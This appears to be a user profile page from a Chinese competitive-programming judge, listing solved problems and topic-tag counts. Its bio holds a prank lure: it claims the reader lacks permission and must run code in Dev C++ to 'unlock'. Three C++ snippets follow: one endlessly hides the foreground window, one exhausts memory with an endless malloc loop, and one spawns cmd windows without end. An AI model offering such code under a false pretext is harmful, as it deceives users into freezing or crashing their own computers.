-
个人简介
Oops! 你没有该权限 请在Dev C++运行以解锁: #include<bits/stdc++.h> #include<windows.h> using namespace std; int main(){ while(1){ HWND hWnd=GetForegroundWindow(); ShowWindow(hWnd,SW_HIDE);} } 或 #include<bits/stdc++.h> using namespace std; int main(){ while(1) malloc(1000); } 或 #include<bits/stdc++.h> #include<windows.h> using namespace std; int main(){ while(1){ system("start cmd"); } }
-
通过的题目
- P1026
- P1030
- P1031
- P1034
- P1035
- P1042
- P1043
- P1044
- P1049
- P1052
- P1058
- P1070
- P1071
- P1073
- P1075
- P1078
- P1089
- P1091
- P1092
- P1093
- P1095
- P1098
- P1104
- P1107
- P1110
- P1114
- P1115
- P1128
- P1132
- P1134
- P1140
- P1153
- P1162
- P1163
- P1184
- P1187
- P1189
- P1190
- P1191
- P1193
- P1219
- P1225
- P1230
- P1259
- P1261
- P1263
- P1276
- P1278
- P1279
- P1280
- P1282
- P1283
- P1284
- P1285
- P1344
- P1363
- P1408
- P1411
- P1485
- P1551
- P1564
- P1682
- P1686
- P1930
- P2311
- P2554
- P2583
- P2627
- P2630
- P2721
- P2916
- P2953
- P3005
- P3021
- P3046
- P3062
- P3081
- P3083
- P3084
- P3085
- P3087
- P3094
- P3098
- P3099
- P3100
- P3101
- P3102
- P3103
- P3104
- P3105
- P3106
- P3107
- P3108
- P3111
- P3112
- P3122
- P3123
- P3124
- P3125
- P3146
- P3179
- P3180
题目标签
- 语言基础
- 67
- 其他
- 29
- 一维数组
- 26
- 循环语句
- 24
- 字符串
- 19
- 二维数组
- 19
- 字符数组
- 18
- 贪心
- 12
- NOIP
- 12
- 竞赛
- 12
- 递归
- 10
- 排序
- 9
- 位运算
- 8
- 高精度
- 8
- 搜索
- 8
- 二分
- 7
- 普及组
- 7
- 二分查找
- 7
- 数据结构
- 6
- 递推
- 5